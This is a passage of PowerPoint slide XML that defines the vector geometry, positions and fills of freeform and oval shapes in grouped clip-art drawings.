                  <a:gd name="T1" fmla="*/ 55 h 62"/>
                  <a:gd name="T2" fmla="*/ 203 w 227"/>
                  <a:gd name="T3" fmla="*/ 0 h 62"/>
                  <a:gd name="T4" fmla="*/ 227 w 227"/>
                  <a:gd name="T5" fmla="*/ 7 h 62"/>
                  <a:gd name="T6" fmla="*/ 26 w 227"/>
                  <a:gd name="T7" fmla="*/ 62 h 62"/>
                  <a:gd name="T8" fmla="*/ 0 w 227"/>
                  <a:gd name="T9" fmla="*/ 55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7" h="62">
                    <a:moveTo>
                      <a:pt x="0" y="55"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="203" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="62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F294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5" name="Freeform 1726"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-556" y="-2973"/>
                <a:ext cx="201" cy="256"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 201"/>
                  <a:gd name="T1" fmla="*/ 256 h 256"/>
                  <a:gd name="T2" fmla="*/ 0 w 201"/>
                  <a:gd name="T3" fmla="*/ 55 h 256"/>
                  <a:gd name="T4" fmla="*/ 201 w 201"/>
                  <a:gd name="T5" fmla="*/ 0 h 256"/>
                  <a:gd name="T6" fmla="*/ 201 w 201"/>
                  <a:gd name="T7" fmla="*/ 201 h 256"/>
                  <a:gd name="T8" fmla="*/ 0 w 201"/>
                  <a:gd name="T9" fmla="*/ 25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1" h="256">
                    <a:moveTo>
                      <a:pt x="0" y="256"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="256"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="F294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6" name="Freeform 1727"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-582" y="-2925"/>
                <a:ext cx="26" cy="208"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 26"/>
                  <a:gd name="T1" fmla="*/ 0 h 208"/>
                  <a:gd name="T2" fmla="*/ 0 w 26"/>
                  <a:gd name="T3" fmla="*/ 200 h 208"/>
                  <a:gd name="T4" fmla="*/ 26 w 26"/>
                  <a:gd name="T5" fmla="*/ 208 h 208"/>
                  <a:gd name="T6" fmla="*/ 26 w 26"/>
                  <a:gd name="T7" fmla="*/ 7 h 208"/>
                  <a:gd name="T8" fmla="*/ 0 w 26"/>
                  <a:gd name="T9" fmla="*/ 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08">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26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94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7" name="Freeform 1728"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-582" y="-3178"/>
                <a:ext cx="227" cy="61"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 227"/>
                  <a:gd name="T1" fmla="*/ 54 h 61"/>
                  <a:gd name="T2" fmla="*/ 203 w 227"/>
                  <a:gd name="T3" fmla="*/ 0 h 61"/>
                  <a:gd name="T4" fmla="*/ 227 w 227"/>
                  <a:gd name="T5" fmla="*/ 7 h 61"/>
                  <a:gd name="T6" fmla="*/ 26 w 227"/>
                  <a:gd name="T7" fmla="*/ 61 h 61"/>
                  <a:gd name="T8" fmla="*/ 0 w 227"/>
                  <a:gd name="T9" fmla="*/ 5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7" h="61">
                    <a:moveTo>
                      <a:pt x="0" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="203" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="61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8" name="Freeform 1729"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-556" y="-3171"/>
                <a:ext cx="201" cy="175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 201"/>
                  <a:gd name="T1" fmla="*/ 175 h 175"/>
                  <a:gd name="T2" fmla="*/ 0 w 201"/>
                  <a:gd name="T3" fmla="*/ 54 h 175"/>
                  <a:gd name="T4" fmla="*/ 201 w 201"/>
                  <a:gd name="T5" fmla="*/ 0 h 175"/>
                  <a:gd name="T6" fmla="*/ 201 w 201"/>
                  <a:gd name="T7" fmla="*/ 120 h 175"/>
                  <a:gd name="T8" fmla="*/ 0 w 201"/>
                  <a:gd name="T9" fmla="*/ 175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1" h="175">
                    <a:moveTo>
                      <a:pt x="0" y="175"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="17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9" name="Freeform 1730"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-582" y="-3124"/>
                <a:ext cx="26" cy="128"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 26"/>
                  <a:gd name="T1" fmla="*/ 0 h 128"/>
                  <a:gd name="T2" fmla="*/ 0 w 26"/>
                  <a:gd name="T3" fmla="*/ 121 h 128"/>
                  <a:gd name="T4" fmla="*/ 26 w 26"/>
                  <a:gd name="T5" fmla="*/ 128 h 128"/>
                  <a:gd name="T6" fmla="*/ 26 w 26"/>
                  <a:gd name="T7" fmla="*/ 7 h 128"/>
                  <a:gd name="T8" fmla="*/ 0 w 26"/>
                  <a:gd name="T9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28">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26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0" name="Freeform 1731"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1882" y="-3648"/>
                <a:ext cx="227" cy="61"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 227"/>
                  <a:gd name="T1" fmla="*/ 54 h 61"/>
                  <a:gd name="T2" fmla="*/ 203 w 227"/>
                  <a:gd name="T3" fmla="*/ 0 h 61"/>
                  <a:gd name="T4" fmla="*/ 227 w 227"/>
                  <a:gd name="T5" fmla="*/ 7 h 61"/>
                  <a:gd name="T6" fmla="*/ 24 w 227"/>
                  <a:gd name="T7" fmla="*/ 61 h 61"/>
                  <a:gd name="T8" fmla="*/ 0 w 227"/>
                  <a:gd name="T9" fmla="*/ 5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7" h="61">
                    <a:moveTo>
                      <a:pt x="0" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="203" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="61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294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1" name="Freeform 1732"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1906" y="-3641"/>
                <a:ext cx="203" cy="257"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 203"/>
                  <a:gd name="T1" fmla="*/ 257 h 257"/>
                  <a:gd name="T2" fmla="*/ 0 w 203"/>
                  <a:gd name="T3" fmla="*/ 54 h 257"/>
                  <a:gd name="T4" fmla="*/ 203 w 203"/>
                  <a:gd name="T5" fmla="*/ 0 h 257"/>
                  <a:gd name="T6" fmla="*/ 203 w 203"/>
                  <a:gd name="T7" fmla="*/ 201 h 257"/>
                  <a:gd name="T8" fmla="*/ 0 w 203"/>
                  <a:gd name="T9" fmla="*/ 257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3" h="257">
                    <a:moveTo>
                      <a:pt x="0" y="257"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="257"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="F294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2" name="Freeform 1733"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1882" y="-3594"/>
                <a:ext cx="24" cy="210"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 24"/>
                  <a:gd name="T1" fmla="*/ 0 h 210"/>
                  <a:gd name="T2" fmla="*/ 0 w 24"/>
                  <a:gd name="T3" fmla="*/ 203 h 210"/>
                  <a:gd name="T4" fmla="*/ 24 w 24"/>
                  <a:gd name="T5" fmla="*/ 210 h 210"/>
                  <a:gd name="T6" fmla="*/ 24 w 24"/>
                  <a:gd name="T7" fmla="*/ 7 h 210"/>
                  <a:gd name="T8" fmla="*/ 0 w 24"/>
                  <a:gd name="T9" fmla="*/ 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10">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24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94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3" name="Freeform 1734"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1882" y="-3847"/>
                <a:ext cx="227" cy="62"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 227"/>
                  <a:gd name="T1" fmla="*/ 55 h 62"/>
                  <a:gd name="T2" fmla="*/ 203 w 227"/>
                  <a:gd name="T3" fmla="*/ 0 h 62"/>
                  <a:gd name="T4" fmla="*/ 227 w 227"/>
                  <a:gd name="T5" fmla="*/ 7 h 62"/>
                  <a:gd name="T6" fmla="*/ 24 w 227"/>
                  <a:gd name="T7" fmla="*/ 62 h 62"/>
                  <a:gd name="T8" fmla="*/ 0 w 227"/>
                  <a:gd name="T9" fmla="*/ 55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7" h="62">
                    <a:moveTo>
                      <a:pt x="0" y="55"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="203" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="62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4" name="Freeform 1735"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1906" y="-3840"/>
                <a:ext cx="203" cy="175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 203"/>
                  <a:gd name="T1" fmla="*/ 175 h 175"/>
                  <a:gd name="T2" fmla="*/ 0 w 203"/>
                  <a:gd name="T3" fmla="*/ 55 h 175"/>
                  <a:gd name="T4" fmla="*/ 203 w 203"/>
                  <a:gd name="T5" fmla="*/ 0 h 175"/>
                  <a:gd name="T6" fmla="*/ 203 w 203"/>
                  <a:gd name="T7" fmla="*/ 121 h 175"/>
                  <a:gd name="T8" fmla="*/ 0 w 203"/>
                  <a:gd name="T9" fmla="*/ 175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3" h="175">
                    <a:moveTo>
                      <a:pt x="0" y="175"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="17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5" name="Freeform 1736"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1882" y="-3792"/>
                <a:ext cx="24" cy="127"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 24"/>
                  <a:gd name="T1" fmla="*/ 0 h 127"/>
                  <a:gd name="T2" fmla="*/ 0 w 24"/>
                  <a:gd name="T3" fmla="*/ 120 h 127"/>
                  <a:gd name="T4" fmla="*/ 24 w 24"/>
                  <a:gd name="T5" fmla="*/ 127 h 127"/>
                  <a:gd name="T6" fmla="*/ 24 w 24"/>
                  <a:gd name="T7" fmla="*/ 7 h 127"/>
                  <a:gd name="T8" fmla="*/ 0 w 24"/>
                  <a:gd name="T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27">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24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6" name="Freeform 1737"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-60" y="-5361"/>
                <a:ext cx="657" cy="843"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 20 w 278"/>
                  <a:gd name="T1" fmla="*/ 354 h 357"/>
                  <a:gd name="T2" fmla="*/ 0 w 278"/>
                  <a:gd name="T3" fmla="*/ 339 h 357"/>
                  <a:gd name="T4" fmla="*/ 0 w 278"/>
                  <a:gd name="T5" fmla="*/ 92 h 357"/>
                  <a:gd name="T6" fmla="*/ 20 w 278"/>
                  <a:gd name="T7" fmla="*/ 67 h 357"/>
                  <a:gd name="T8" fmla="*/ 259 w 278"/>
                  <a:gd name="T9" fmla="*/ 3 h 357"/>
                  <a:gd name="T10" fmla="*/ 278 w 278"/>
                  <a:gd name="T11" fmla="*/ 18 h 357"/>
                  <a:gd name="T12" fmla="*/ 278 w 278"/>
                  <a:gd name="T13" fmla="*/ 265 h 357"/>
                  <a:gd name="T14" fmla="*/ 259 w 278"/>
                  <a:gd name="T15" fmla="*/ 290 h 357"/>
                  <a:gd name="T16" fmla="*/ 20 w 278"/>
                  <a:gd name="T17" fmla="*/ 354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8" h="357">
                    <a:moveTo>
                      <a:pt x="20" y="354"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="357"/>
                      <a:pt x="0" y="350"/>
                      <a:pt x="0" y="339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0" y="81"/>
                      <a:pt x="9" y="70"/>
                      <a:pt x="20" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="259" y="3"/>
                      <a:pt x="259" y="3"/>
                      <a:pt x="259" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="269" y="0"/>
                      <a:pt x="278" y="7"/>
                      <a:pt x="278" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="278" y="265"/>
                      <a:pt x="278" y="265"/>
                      <a:pt x="278" y="265"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="278" y="276"/>
                      <a:pt x="269" y="287"/>
                      <a:pt x="259" y="290"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="20" y="354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7" name="Freeform 1738"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="913" y="-5625"/>
                <a:ext cx="655" cy="845"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 19 w 277"/>
                  <a:gd name="T1" fmla="*/ 355 h 358"/>
                  <a:gd name="T2" fmla="*/ 0 w 277"/>
                  <a:gd name="T3" fmla="*/ 340 h 358"/>
                  <a:gd name="T4" fmla="*/ 0 w 277"/>
                  <a:gd name="T5" fmla="*/ 93 h 358"/>
                  <a:gd name="T6" fmla="*/ 19 w 277"/>
                  <a:gd name="T7" fmla="*/ 67 h 358"/>
                  <a:gd name="T8" fmla="*/ 258 w 277"/>
                  <a:gd name="T9" fmla="*/ 3 h 358"/>
                  <a:gd name="T10" fmla="*/ 277 w 277"/>
                  <a:gd name="T11" fmla="*/ 18 h 358"/>
                  <a:gd name="T12" fmla="*/ 277 w 277"/>
                  <a:gd name="T13" fmla="*/ 265 h 358"/>
                  <a:gd name="T14" fmla="*/ 258 w 277"/>
                  <a:gd name="T15" fmla="*/ 291 h 358"/>
                  <a:gd name="T16" fmla="*/ 19 w 277"/>
                  <a:gd name="T17" fmla="*/ 355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7" h="358">
                    <a:moveTo>
                      <a:pt x="19" y="355"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="358"/>
                      <a:pt x="0" y="351"/>
                      <a:pt x="0" y="340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82"/>
                      <a:pt x="8" y="70"/>
                      <a:pt x="19" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="258" y="3"/>
                      <a:pt x="258" y="3"/>
                      <a:pt x="258" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="268" y="0"/>
                      <a:pt x="277" y="7"/>
                      <a:pt x="277" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="277" y="265"/>
                      <a:pt x="277" y="265"/>
                      <a:pt x="277" y="265"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="277" y="276"/>
                      <a:pt x="268" y="288"/>
                      <a:pt x="258" y="291"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19" y="35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748" name="Group 2509"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6261705" y="2591842"/>
              <a:ext cx="1366144" cy="396408"/>
              <a:chOff x="2158" y="2963"/>
              <a:chExt cx="3583" cy="1038"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="749" name="Freeform 2510"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2158" y="2963"/>
                <a:ext cx="3583" cy="962"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3583"/>
                  <a:gd name="T1" fmla="*/ 601 h 962"/>
                  <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                  <a:gd name="T3" fmla="*/ 0 h 962"/>
                  <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T5" fmla="*/ 360 h 962"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                  <a:gd name="T7" fmla="*/ 962 h 962"/>
                  <a:gd name="T8" fmla="*/ 0 w 3583"/>
                  <a:gd name="T9" fmla="*/ 601 h 9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83"/>
                  <a:gd name="T16" fmla="*/ 0 h 962"/>
                  <a:gd name="T17" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T18" fmla="*/ 962 h 9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83" h="962">
                    <a:moveTo>
                      <a:pt x="0" y="601"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3583" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="601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0" name="Freeform 2511"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3502" y="3323"/>
                <a:ext cx="2239" cy="678"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 602 h 678"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T3" fmla="*/ 0 h 678"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 75 h 678"/>
                  <a:gd name="T6" fmla="*/ 0 w 2239"/>
                  <a:gd name="T7" fmla="*/ 678 h 678"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 602 h 6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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 678"/>
                  <a:gd name="T17" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T18" fmla="*/ 678 h 6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9" h="678">
                    <a:moveTo>
                      <a:pt x="0" y="602"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="602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1" name="Freeform 2512"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2158" y="3564"/>
                <a:ext cx="1344" cy="437"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 437"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 437"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 437 h 437"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 75 h 437"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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4"/>
                  <a:gd name="T16" fmla="*/ 0 h 437"/>
                  <a:gd name="T17" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T18" fmla="*/ 437 h 4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4" h="437">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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2" name="Oval 2513"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2900" y="3679"/>
                <a:ext cx="170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3" name="Oval 2514"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3145" y="3613"/>
                <a:ext cx="170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4" name="Oval 2515"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3389" y="3547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5" name="Oval 2516"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3634" y="3481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6" name="Oval 2517"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3877" y="3417"/>
                <a:ext cx="173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7" name="Oval 2518"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4123" y="3351"/>
                <a:ext cx="173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8" name="Oval 2519"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4366" y="3285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9" name="Oval 2520"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4612" y="3219"/>
                <a:ext cx="170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0" name="Oval 2521"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4858" y="3155"/>
                <a:ext cx="170" cy="4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761" name="Group 2634"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="7194530" y="2496047"/>
              <a:ext cx="927617" cy="836841"/>
              <a:chOff x="2208" y="2778"/>
              <a:chExt cx="654" cy="590"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="762" name="Freeform 2635"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2208" y="3063"/>
                <a:ext cx="229" cy="305"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3144"/>
                  <a:gd name="T1" fmla="*/ 4195 h 4195"/>
                  <a:gd name="T2" fmla="*/ 0 w 3144"/>
                  <a:gd name="T3" fmla="*/ 843 h 4195"/>
                  <a:gd name="T4" fmla="*/ 3144 w 3144"/>
                  <a:gd name="T5" fmla="*/ 0 h 4195"/>
                  <a:gd name="T6" fmla="*/ 3144 w 3144"/>
                  <a:gd name="T7" fmla="*/ 3350 h 4195"/>
                  <a:gd name="T8" fmla="*/ 0 w 3144"/>
                  <a:gd name="T9" fmla="*/ 4195 h 41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44"/>
                  <a:gd name="T16" fmla="*/ 0 h 4195"/>
                  <a:gd name="T17" fmla="*/ 3144 w 3144"/>
                  <a:gd name="T18" fmla="*/ 4195 h 41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44" h="4195">
                    <a:moveTo>
                      <a:pt x="0" y="4195"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3144" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3144" y="3350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="419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3" name="Freeform 2636"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2208" y="2892"/>
                <a:ext cx="114" cy="201"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1569"/>
                  <a:gd name="T1" fmla="*/ 2764 h 2764"/>
                  <a:gd name="T2" fmla="*/ 1569 w 1569"/>
                  <a:gd name="T3" fmla="*/ 0 h 2764"/>
                  <a:gd name="T4" fmla="*/ 1569 w 1569"/>
                  <a:gd name="T5" fmla="*/ 2343 h 2764"/>
